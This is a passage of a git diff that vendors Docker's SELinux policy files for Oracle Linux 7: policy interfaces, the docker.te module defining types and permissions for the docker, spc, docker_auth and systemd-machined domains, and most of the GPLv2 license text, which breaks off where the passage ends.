+       gen_require(`
+               attribute svirt_sandbox_domain;
+       ')
+
+       allow $1 svirt_sandbox_domain:process signal;
+')
+
+#######################################
+## <summary>
+##     Getattr Sandbox File systems
+## </summary>
+## <param name="domain">
+##     <summary>
+##     Domain allowed access.
+##     </summary>
+## </param>
+#
+interface(`virt_getattr_sandbox_filesystem',`
+       gen_require(`
+              type svirt_sandbox_file_t;
+       ')
+
+       allow $1 svirt_sandbox_file_t:filesystem getattr;
+')
+
+#######################################
+## <summary>
+##     Read Sandbox Files
+## </summary>
+## <param name="domain">
+##     <summary>
+##     Domain allowed access.
+##     </summary>
+## </param>
+#
+interface(`virt_read_sandbox_files',`
+       gen_require(`
+               type svirt_sandbox_file_t;
+       ')
+
+       list_dirs_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t)
+       read_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t)
+       read_lnk_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t)
+')
+
+#######################################
+## <summary>
+##      Read the process state of spc containers
+## </summary>
+## <param name="domain">
+##      <summary>
+##      Domain allowed access.
+##      </summary>
+## </param>
+#
+interface(`docker_spc_read_state',`
+        gen_require(`
+                type spc_t;
+        ')
+
+        ps_process_pattern($1, spc_t)
+')
+
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te
new file mode 100644
index 0000000000..d4de36fe46
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te
@@ -0,0 +1,465 @@
+policy_module(docker, 1.0.0)
+
+########################################
+#
+# Declarations
+#
+
+## <desc>
+##  <p>
+##  Determine whether docker can
+##  connect to all TCP ports.
+##  </p>
+## </desc>
+gen_tunable(docker_connect_any, false)
+
+type docker_t;
+type docker_exec_t;
+init_daemon_domain(docker_t, docker_exec_t)
+domain_subj_id_change_exemption(docker_t)
+domain_role_change_exemption(docker_t)
+
+type spc_t;
+domain_type(spc_t)
+role system_r types spc_t;
+
+type docker_auth_t;
+type docker_auth_exec_t;
+init_daemon_domain(docker_auth_t, docker_auth_exec_t)
+
+type spc_var_run_t;
+files_pid_file(spc_var_run_t)
+
+type docker_var_lib_t;
+files_type(docker_var_lib_t)
+
+type docker_home_t;
+userdom_user_home_content(docker_home_t)
+
+type docker_config_t;
+files_config_file(docker_config_t)
+
+type docker_lock_t;
+files_lock_file(docker_lock_t)
+
+type docker_log_t;
+logging_log_file(docker_log_t)
+
+type docker_tmp_t;
+files_tmp_file(docker_tmp_t)
+
+type docker_tmpfs_t;
+files_tmpfs_file(docker_tmpfs_t)
+
+type docker_var_run_t;
+files_pid_file(docker_var_run_t)
+
+type docker_plugin_var_run_t;
+files_pid_file(docker_plugin_var_run_t)
+
+type docker_unit_file_t;
+systemd_unit_file(docker_unit_file_t)
+
+type docker_devpts_t;
+term_pty(docker_devpts_t)
+
+type docker_share_t;
+files_type(docker_share_t)
+
+# OL7 systemd selinux update
+type systemd_machined_t;
+type systemd_machined_exec_t;
+init_daemon_domain(systemd_machined_t, systemd_machined_exec_t)
+
+# /run/systemd/machines
+type systemd_machined_var_run_t;
+files_pid_file(systemd_machined_var_run_t)
+
+# /var/lib/machines
+type systemd_machined_var_lib_t;
+files_type(systemd_machined_var_lib_t)
+
+
+########################################
+#
+# docker local policy
+#
+allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap };
+allow docker_t self:tun_socket relabelto;
+allow docker_t self:process { getattr signal_perms setrlimit setfscreate };
+allow docker_t self:fifo_file rw_fifo_file_perms;
+allow docker_t self:unix_stream_socket create_stream_socket_perms;
+allow docker_t self:tcp_socket create_stream_socket_perms;
+allow docker_t self:udp_socket create_socket_perms;
+allow docker_t self:capability2 block_suspend;
+
+docker_auth_stream_connect(docker_t)
+
+manage_files_pattern(docker_t, docker_home_t, docker_home_t)
+manage_dirs_pattern(docker_t, docker_home_t, docker_home_t)
+manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t)
+userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker")
+
+manage_dirs_pattern(docker_t, docker_config_t, docker_config_t)
+manage_files_pattern(docker_t, docker_config_t, docker_config_t)
+files_etc_filetrans(docker_t, docker_config_t, dir, "docker")
+
+manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t)
+manage_files_pattern(docker_t, docker_lock_t, docker_lock_t)
+files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc")
+
+manage_dirs_pattern(docker_t, docker_log_t, docker_log_t)
+manage_files_pattern(docker_t, docker_log_t, docker_log_t)
+manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t)
+logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file })
+allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto };
+
+manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file })
+
+manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+allow docker_t docker_tmpfs_t:dir relabelfrom;
+can_exec(docker_t, docker_tmpfs_t)
+fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file })
+allow docker_t docker_tmpfs_t:chr_file mounton;
+
+manage_dirs_pattern(docker_t, docker_share_t, docker_share_t)
+manage_files_pattern(docker_t, docker_share_t, docker_share_t)
+manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t)
+allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto };
+
+can_exec(docker_t, docker_share_t)
+#docker_filetrans_named_content(docker_t)
+
+manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto };
+files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file })
+
+manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file })
+
+allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms };
+term_create_pty(docker_t, docker_devpts_t)
+
+kernel_read_system_state(docker_t)
+kernel_read_network_state(docker_t)
+kernel_read_all_sysctls(docker_t)
+kernel_rw_net_sysctls(docker_t)
+kernel_setsched(docker_t)
+kernel_read_all_proc(docker_t)
+
+domain_use_interactive_fds(docker_t)
+domain_dontaudit_read_all_domains_state(docker_t)
+
+corecmd_exec_bin(docker_t)
+corecmd_exec_shell(docker_t)
+
+corenet_tcp_bind_generic_node(docker_t)
+corenet_tcp_sendrecv_generic_if(docker_t)
+corenet_tcp_sendrecv_generic_node(docker_t)
+corenet_tcp_sendrecv_generic_port(docker_t)
+corenet_tcp_bind_all_ports(docker_t)
+corenet_tcp_connect_http_port(docker_t)
+corenet_tcp_connect_commplex_main_port(docker_t)
+corenet_udp_sendrecv_generic_if(docker_t)
+corenet_udp_sendrecv_generic_node(docker_t)
+corenet_udp_sendrecv_all_ports(docker_t)
+corenet_udp_bind_generic_node(docker_t)
+corenet_udp_bind_all_ports(docker_t)
+
+files_read_config_files(docker_t)
+files_dontaudit_getattr_all_dirs(docker_t)
+files_dontaudit_getattr_all_files(docker_t)
+
+fs_read_cgroup_files(docker_t)
+fs_read_tmpfs_symlinks(docker_t)
+fs_search_all(docker_t)
+fs_getattr_all_fs(docker_t)
+
+storage_raw_rw_fixed_disk(docker_t)
+
+auth_use_nsswitch(docker_t)
+auth_dontaudit_getattr_shadow(docker_t)
+
+init_read_state(docker_t)
+init_status(docker_t)
+
+logging_send_audit_msgs(docker_t)
+logging_send_syslog_msg(docker_t)
+
+miscfiles_read_localization(docker_t)
+
+mount_domtrans(docker_t)
+
+seutil_read_default_contexts(docker_t)
+seutil_read_config(docker_t)
+
+sysnet_dns_name_resolve(docker_t)
+sysnet_exec_ifconfig(docker_t)
+
+optional_policy(`
+	rpm_exec(docker_t)
+	rpm_read_db(docker_t)
+	rpm_exec(docker_t)
+')
+
+optional_policy(`
+	fstools_domtrans(docker_t)
+')
+
+optional_policy(`
+	iptables_domtrans(docker_t)
+')
+
+optional_policy(`
+	openvswitch_stream_connect(docker_t)
+')
+
+#
+# lxc rules
+#
+
+allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace };
+
+allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms };
+
+allow docker_t self:netlink_route_socket rw_netlink_socket_perms;;
+allow docker_t self:netlink_audit_socket create_netlink_socket_perms;
+allow docker_t self:unix_dgram_socket { create_socket_perms sendto };
+allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto };
+
+allow docker_t docker_var_lib_t:dir mounton;
+allow docker_t docker_var_lib_t:chr_file mounton;
+can_exec(docker_t, docker_var_lib_t)
+
+kernel_dontaudit_setsched(docker_t)
+kernel_get_sysvipc_info(docker_t)
+kernel_request_load_module(docker_t)
+kernel_mounton_messages(docker_t)
+kernel_mounton_all_proc(docker_t)
+kernel_mounton_all_sysctls(docker_t)
+kernel_unlabeled_entry_type(spc_t)
+kernel_unlabeled_domtrans(docker_t, spc_t)
+
+dev_getattr_all(docker_t)
+dev_getattr_sysfs_fs(docker_t)
+dev_read_urand(docker_t)
+dev_read_lvm_control(docker_t)
+dev_rw_sysfs(docker_t)
+dev_rw_loop_control(docker_t)
+dev_rw_lvm_control(docker_t)
+
+files_getattr_isid_type_dirs(docker_t)
+files_manage_isid_type_dirs(docker_t)
+files_manage_isid_type_files(docker_t)
+files_manage_isid_type_symlinks(docker_t)
+files_manage_isid_type_chr_files(docker_t)
+files_manage_isid_type_blk_files(docker_t)
+files_exec_isid_files(docker_t)
+files_mounton_isid(docker_t)
+files_mounton_non_security(docker_t)
+files_mounton_isid_type_chr_file(docker_t)
+
+fs_mount_all_fs(docker_t)
+fs_unmount_all_fs(docker_t)
+fs_remount_all_fs(docker_t)
+files_mounton_isid(docker_t)
+fs_manage_cgroup_dirs(docker_t)
+fs_manage_cgroup_files(docker_t)
+fs_relabelfrom_xattr_fs(docker_t)
+fs_relabelfrom_tmpfs(docker_t)
+fs_read_tmpfs_symlinks(docker_t)
+fs_list_hugetlbfs(docker_t)
+
+term_use_generic_ptys(docker_t)
+term_use_ptmx(docker_t)
+term_getattr_pty_fs(docker_t)
+term_relabel_pty_fs(docker_t)
+term_mounton_unallocated_ttys(docker_t)
+
+modutils_domtrans_insmod(docker_t)
+
+systemd_status_all_unit_files(docker_t)
+systemd_start_systemd_services(docker_t)
+
+userdom_stream_connect(docker_t)
+userdom_search_user_home_content(docker_t)
+userdom_read_all_users_state(docker_t)
+userdom_relabel_user_home_files(docker_t)
+userdom_relabel_user_tmp_files(docker_t)
+userdom_relabel_user_tmp_dirs(docker_t)
+
+optional_policy(`
+	gpm_getattr_gpmctl(docker_t)
+')
+
+optional_policy(`
+	dbus_system_bus_client(docker_t)
+	init_dbus_chat(docker_t)
+	init_start_transient_unit(docker_t)
+
+	optional_policy(`
+		systemd_dbus_chat_logind(docker_t)
+		systemd_dbus_chat_machined(docker_t)
+	')
+
+	optional_policy(`
+		firewalld_dbus_chat(docker_t)
+	')
+')
+
+optional_policy(`
+	udev_read_db(docker_t)
+')
+
+optional_policy(`
+	unconfined_domain(docker_t)
+	# unconfined_typebounds(docker_t)
+')
+
+optional_policy(`
+	virt_read_config(docker_t)
+	virt_exec(docker_t)
+	virt_stream_connect(docker_t)
+	virt_stream_connect_sandbox(docker_t)
+	virt_exec_sandbox_files(docker_t)
+	virt_manage_sandbox_files(docker_t)
+	virt_relabel_sandbox_filesystem(docker_t)
+	# for lxc
+	virt_transition_svirt_sandbox(docker_t, system_r)
+	virt_mounton_sandbox_file(docker_t)
+#	virt_attach_sandbox_tun_iface(docker_t)
+	allow docker_t svirt_sandbox_domain:tun_socket relabelfrom;
+	virt_sandbox_entrypoint(docker_t)
+')
+
+tunable_policy(`docker_connect_any',`
+    corenet_tcp_connect_all_ports(docker_t)
+    corenet_sendrecv_all_packets(docker_t)
+    corenet_tcp_sendrecv_all_ports(docker_t)
+')
+
+########################################
+#
+# spc local policy
+#
+allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint;
+role system_r types spc_t;
+
+domtrans_pattern(docker_t, docker_share_t, spc_t)
+domtrans_pattern(docker_t, docker_var_lib_t, spc_t)
+allow docker_t spc_t:process { setsched signal_perms };
+ps_process_pattern(docker_t, spc_t)
+allow docker_t spc_t:socket_class_set { relabelto relabelfrom };
+filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay")
+
+optional_policy(`
+	systemd_dbus_chat_machined(spc_t)
+')
+
+optional_policy(`
+	dbus_chat_system_bus(spc_t)
+')
+
+optional_policy(`
+	unconfined_domain_noaudit(spc_t)
+')
+
+optional_policy(`
+	virt_transition_svirt_sandbox(spc_t, system_r)
+	virt_sandbox_entrypoint(spc_t)
+')
+
+########################################
+#
+# docker_auth local policy
+#
+allow docker_auth_t self:fifo_file rw_fifo_file_perms;
+allow docker_auth_t self:unix_stream_socket create_stream_socket_perms;
+dontaudit docker_auth_t self:capability net_admin;
+
+docker_stream_connect(docker_auth_t)
+
+manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file })
+
+domain_use_interactive_fds(docker_auth_t)
+
+kernel_read_net_sysctls(docker_auth_t)
+
+auth_use_nsswitch(docker_auth_t)
+
+files_read_etc_files(docker_auth_t)
+
+miscfiles_read_localization(docker_auth_t)
+
+sysnet_dns_name_resolve(docker_auth_t)
+
+########################################
+#
+# OL7.2 systemd selinux update
+# systemd_machined local policy
+#
+allow systemd_machined_t self:capability { dac_override setgid sys_admin sys_chroot sys_ptrace };
+allow systemd_machined_t systemd_unit_file_t:service { status start };
+allow systemd_machined_t self:unix_dgram_socket create_socket_perms;
+
+manage_dirs_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t)
+manage_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t)
+manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t)
+init_pid_filetrans(systemd_machined_t, systemd_machined_var_run_t, dir, "machines")
+
+manage_dirs_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t)
+manage_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t)
+manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t)
+init_var_lib_filetrans(systemd_machined_t, systemd_machined_var_lib_t, dir, "machines")
+
+kernel_dgram_send(systemd_machined_t)
+# This is a bug, but need for now.
+kernel_read_unlabeled_state(systemd_machined_t)
+
+init_dbus_chat(systemd_machined_t)
+init_status(systemd_machined_t)
+
+userdom_dbus_send_all_users(systemd_machined_t)
+
+term_use_ptmx(systemd_machined_t)
+
+optional_policy(`
+       dbus_connect_system_bus(systemd_machined_t)
+       dbus_system_bus_client(systemd_machined_t)
+')
+
+optional_policy(`
+       docker_read_share_files(systemd_machined_t)
+       docker_spc_read_state(systemd_machined_t)
+')
+
+optional_policy(`
+       virt_dbus_chat(systemd_machined_t)
+       virt_sandbox_read_state(systemd_machined_t)
+       virt_signal_sandbox(systemd_machined_t)
+       virt_stream_connect_sandbox(systemd_machined_t)
+       virt_rw_svirt_dev(systemd_machined_t)
+       virt_getattr_sandbox_filesystem(systemd_machined_t)
+       virt_read_sandbox_files(systemd_machined_t)
+')
+
+
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE
new file mode 100644
index 0000000000..5b6e7c66c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE
@@ -0,0 +1,340 @@
+		    GNU GENERAL PUBLIC LICENSE
+		       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.
+                       59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Library General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+		    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+			    NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+	    How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
